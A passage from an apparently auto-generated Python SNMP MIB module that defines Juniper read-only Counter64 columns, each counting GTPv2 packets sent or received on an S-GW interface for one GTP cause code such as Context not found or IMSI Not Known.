if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNPTSIAdbrRx.setDescription('Number of GTPV2 packets received with cause New PDN type due to Single Address Bearer.')
jnxMbgSgwIfGtpV2ICsNPTSIAdbrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 96), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNPTSIAdbrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNPTSIAdbrTx.setDescription('Number of GTP packets sent with cause New PDN type due to Single Address Bearer.')
jnxMbgSgwIfGtpV2ICsCtxNotFndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 97), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsCtxNotFndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsCtxNotFndRx.setDescription('Number of GTPV2 packets received with cause Context not found.')
jnxMbgSgwIfGtpV2ICsCtxNotFndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 98), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsCtxNotFndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsCtxNotFndTx.setDescription('Number of GTP packets sent with cause Context not found.')
jnxMbgSgwIfGtpV2ICsInvMsgFmtRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 99), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvMsgFmtRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvMsgFmtRx.setDescription('Number of GTPV2 packets received with cause Invalid Message Format.')
jnxMbgSgwIfGtpV2ICsInvMsgFmtTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 100), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvMsgFmtTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvMsgFmtTx.setDescription('Number of GTP packets sent with cause Invalid Message Format.')
jnxMbgSgwIfGtpV2ICsVerNotSuppRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 101), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsVerNotSuppRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsVerNotSuppRx.setDescription('Number of GTPV2 packets received with cause Version not Supported.')
jnxMbgSgwIfGtpV2ICsVerNotSuppTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 102), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsVerNotSuppTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsVerNotSuppTx.setDescription('Number of GTP packets sent with cause Version not Supported.')
jnxMbgSgwIfGtpV2ICsInvLenRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 103), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvLenRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvLenRx.setDescription('Number of GTPV2 packets received with cause Invalid Length.')
jnxMbgSgwIfGtpV2ICsInvLenTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 104), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvLenTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvLenTx.setDescription('Number of GTP packets sent with cause Invalid Length.')
jnxMbgSgwIfGtpV2ICsSrvNotSuppRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 105), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSrvNotSuppRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSrvNotSuppRx.setDescription('Number of GTPV2 packets received with cause Service Not supported.')
jnxMbgSgwIfGtpV2ICsSrvNotSuppTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 106), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSrvNotSuppTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSrvNotSuppTx.setDescription('Number of GTP packets sent with cause Service Not supported.')
jnxMbgSgwIfGtpV2ICsManIEIncorRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 107), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsManIEIncorRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsManIEIncorRx.setDescription('Number of GTPV2 packets received with cause Mandatory IE incorrect.')
jnxMbgSgwIfGtpV2ICsManIEIncorTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 108), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsManIEIncorTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsManIEIncorTx.setDescription('Number of GTP packets sent with cause Mandatory IE incorrect.')
jnxMbgSgwIfGtpV2ICsManIEMissRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 109), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsManIEMissRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsManIEMissRx.setDescription('Number of GTPV2 packets received with cause Mandatory IE Missing.')
jnxMbgSgwIfGtpV2ICsManIEMissTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 110), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsManIEMissTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsManIEMissTx.setDescription('Number of GTP packets sent with cause Mandatory IE Missing.')
jnxMbgSgwIfGtpV2ICsOptIEIncorRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 111), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsOptIEIncorRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsOptIEIncorRx.setDescription('Number of GTPV2 packets received with cause Optional IE Incorrect.')
jnxMbgSgwIfGtpV2ICsOptIEIncorTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 112), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsOptIEIncorTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsOptIEIncorTx.setDescription('Number of GTP packets sent with cause Optional IE Incorrect.')
jnxMbgSgwIfGtpV2ICsSysFailRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 113), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSysFailRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSysFailRx.setDescription('Number of GTPV2 packets received with cause System Failure.')
jnxMbgSgwIfGtpV2ICsSysFailTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 114), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSysFailTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSysFailTx.setDescription('Number of GTP packets sent with cause System Failure.')
jnxMbgSgwIfGtpV2ICsNoResRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 115), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNoResRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNoResRx.setDescription('Number of GTPV2 packets received with cause No Resource.')
jnxMbgSgwIfGtpV2ICsNoResTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 116), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNoResTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNoResTx.setDescription('Number of GTP packets sent with cause No Resource.')
jnxMbgSgwIfGtpV2ICsTFTSMANTErRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 117), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsTFTSMANTErRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsTFTSMANTErRx.setDescription('Number of GTPV2 packets received with cause TFT Symantic Error.')
jnxMbgSgwIfGtpV2ICsTFTSMANTErTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 118), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsTFTSMANTErTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsTFTSMANTErTx.setDescription('Number of GTP packets sent with cause TFT Symantic Error.')
jnxMbgSgwIfGtpV2ICsTFTSysErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 119), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsTFTSysErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsTFTSysErrRx.setDescription('Number of GTPV2 packets received with cause TFT System Error.')
jnxMbgSgwIfGtpV2ICsTFTSysErrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 120), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsTFTSysErrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsTFTSysErrTx.setDescription('Number of GTP packets sent with cause TFT System Error.')
jnxMbgSgwIfGtpV2ICsPkFltManErRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 121), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPkFltManErRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPkFltManErRx.setDescription('Number of GTPV2 packets received with cause Packet Filter Symantic Error.')
jnxMbgSgwIfGtpV2ICsPkFltManErTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 122), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPkFltManErTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPkFltManErTx.setDescription('Number of GTP packets sent with cause Packet Filter Symantic Error.')
jnxMbgSgwIfGtpV2ICsPkFltSynErRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 123), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPkFltSynErRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPkFltSynErRx.setDescription('Number of GTPV2 packets received with cause Packet Filter Syntax Error.')
jnxMbgSgwIfGtpV2ICsPkFltSynErTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 124), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPkFltSynErTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPkFltSynErTx.setDescription('Number of GTP packets sent with cause Packet Filter Syntax Error.')
jnxMbgSgwIfGtpV2ICsMisUnknAPNRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 125), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsMisUnknAPNRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsMisUnknAPNRx.setDescription('Number of GTPV2 packets received with cause Unknown APN.')
jnxMbgSgwIfGtpV2ICsMisUnknAPNTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 126), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsMisUnknAPNTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsMisUnknAPNTx.setDescription('Number of GTP packets sent with cause Unknown APN.')
jnxMbgSgwIfGtpV2ICsUnexpRptIERx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 127), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnexpRptIERx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnexpRptIERx.setDescription('Number of GTPV2 packets received with cause Unexpected Repeated IE.')
jnxMbgSgwIfGtpV2ICsUnexpRptIETx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 128), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnexpRptIETx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnexpRptIETx.setDescription('Number of GTP packets sent with cause Unexpected Repeated IE.')
jnxMbgSgwIfGtpV2ICsGREKeyNtFdRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 129), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsGREKeyNtFdRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsGREKeyNtFdRx.setDescription('Number of GTPV2 packets received with cause GRE Key Not Found.')
jnxMbgSgwIfGtpV2ICsGREKeyNtFdTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 130), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsGREKeyNtFdTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsGREKeyNtFdTx.setDescription('Number of GTP packets sent with cause GRE Key Not Found.')
jnxMbgSgwIfGtpV2ICsRelocFailRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 131), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRelocFailRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRelocFailRx.setDescription('Number of GTPV2 packets received with cause Relocation Failed.')
jnxMbgSgwIfGtpV2ICsRelocFailTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 132), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRelocFailTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRelocFailTx.setDescription('Number of GTP packets sent with cause Relocation Failed.')
jnxMbgSgwIfGtpV2ICsDenINRatRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 133), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsDenINRatRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsDenINRatRx.setDescription('Number of GTPV2 packets received with cause Denied in RAT.')
jnxMbgSgwIfGtpV2ICsDenINRatTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 134), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsDenINRatTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsDenINRatTx.setDescription('Number of GTP packets sent with cause Denied in RAT.')
jnxMbgSgwIfGtpV2ICsPTNotSuppRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 135), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPTNotSuppRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPTNotSuppRx.setDescription('Number of GTPV2 packets received with cause PDN Type Not Supported.')
jnxMbgSgwIfGtpV2ICsPTNotSuppTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 136), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPTNotSuppTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPTNotSuppTx.setDescription('Number of GTP packets sent with cause PDN Type Not Supported.')
jnxMbgSgwIfGtpV2ICsAlDynAdOccRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 137), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAlDynAdOccRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAlDynAdOccRx.setDescription('Number of GTPV2 packets received with cause Allocated Dynamic Address Occupied.')
jnxMbgSgwIfGtpV2ICsAlDynAdOccTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 138), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAlDynAdOccTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAlDynAdOccTx.setDescription('Number of GTP packets sent with cause Allocated Dynamic Address Occupied.')
jnxMbgSgwIfGtpV2ICsNOTFTUECTXRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 139), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNOTFTUECTXRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNOTFTUECTXRx.setDescription('Number of GTPV2 packets received with cause UE Context Without TFT Exists.')
jnxMbgSgwIfGtpV2ICsNOTFTUECTXTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 140), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNOTFTUECTXTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNOTFTUECTXTx.setDescription('Number of GTP packets sent with cause UE Context Without TFT Exists.')
jnxMbgSgwIfGtpV2ICsProtoNtSupRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 141), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsProtoNtSupRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsProtoNtSupRx.setDescription('Number of GTPV2 packets received with cause Protocol Not Supported.')
jnxMbgSgwIfGtpV2ICsProtoNtSupTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 142), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsProtoNtSupTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsProtoNtSupTx.setDescription('Number of GTP packets sent with cause Protocol Not Supported.')
jnxMbgSgwIfGtpV2ICsUENotRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 143), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUENotRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUENotRespRx.setDescription('Number of GTPV2 packets received with cause UE Not Responding.')
jnxMbgSgwIfGtpV2ICsUENotRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 144), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUENotRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUENotRespTx.setDescription('Number of GTP packets sent with cause UE Not Responding.')
jnxMbgSgwIfGtpV2ICsUERefusesRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 145), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUERefusesRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUERefusesRx.setDescription('Number of GTPV2 packets received with cause UE Refuses.')
jnxMbgSgwIfGtpV2ICsUERefusesTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 146), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUERefusesTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUERefusesTx.setDescription('Number of GTP packets sent with cause UE Refuses.')
jnxMbgSgwIfGtpV2ICsServDeniedRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 147), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsServDeniedRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsServDeniedRx.setDescription('Number of GTPV2 packets received with cause Service Denied.')
jnxMbgSgwIfGtpV2ICsServDeniedTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 148), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsServDeniedTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsServDeniedTx.setDescription('Number of GTP packets sent with cause Service Denied.')
jnxMbgSgwIfGtpV2ICsUnabPageUERx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 149), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnabPageUERx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnabPageUERx.setDescription('Number of GTPV2 packets received with cause Unable to Page UE.')
jnxMbgSgwIfGtpV2ICsUnabPageUETx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 150), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnabPageUETx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnabPageUETx.setDescription('Number of GTP packets sent with cause Unable to Page UE.')
jnxMbgSgwIfGtpV2ICsNoMemRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 151), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNoMemRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNoMemRx.setDescription('Number of GTPV2 packets received with cause No Memory.')
jnxMbgSgwIfGtpV2ICsNoMemTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 152), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNoMemTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNoMemTx.setDescription('Number of GTP packets sent with cause No Memory.')
jnxMbgSgwIfGtpV2ICsUserAUTHFlRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 153), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUserAUTHFlRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUserAUTHFlRx.setDescription('Number of GTPV2 packets received with cause User AUTH Failed.')
jnxMbgSgwIfGtpV2ICsUserAUTHFlTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 154), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUserAUTHFlTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUserAUTHFlTx.setDescription('Number of GTP packets sent with cause User AUTH Failed.')
jnxMbgSgwIfGtpV2ICsAPNAcsDenRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 155), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAPNAcsDenRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAPNAcsDenRx.setDescription('Number of GTPV2 packets received with cause APN Access Denied.')
jnxMbgSgwIfGtpV2ICsAPNAcsDenTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 156), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAPNAcsDenTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAPNAcsDenTx.setDescription('Number of GTP packets sent with cause APN Access Denied.')
jnxMbgSgwIfGtpV2ICsReqRejRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 157), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsReqRejRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsReqRejRx.setDescription('Number of GTPV2 packets received with cause Request Rejected.')
jnxMbgSgwIfGtpV2ICsReqRejTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 158), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsReqRejTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsReqRejTx.setDescription('Number of GTP packets sent with cause Request Rejected.')
jnxMbgSgwIfGtpV2ICsPTMSISigMMRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 159), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPTMSISigMMRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPTMSISigMMRx.setDescription('Number of GTPV2 packets received with cause P-TMSI Signature Mismatch.')
jnxMbgSgwIfGtpV2ICsPTMSISigMMTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 160), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPTMSISigMMTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPTMSISigMMTx.setDescription('Number of GTP packets sent with cause P-TMSI Signature Mismatch')
jnxMbgSgwIfGtpV2ICsIMSINotKnRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 161), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsIMSINotKnRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsIMSINotKnRx.setDescription('Number of GTPV2 packets received with cause IMSI Not Known.')
jnxMbgSgwIfGtpV2ICsIMSINotKnTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 162), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsIMSINotKnTx.setStatus('current')
